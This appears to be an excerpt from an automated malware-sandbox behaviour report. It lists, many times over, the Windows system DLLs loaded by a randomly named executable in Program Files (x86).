    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
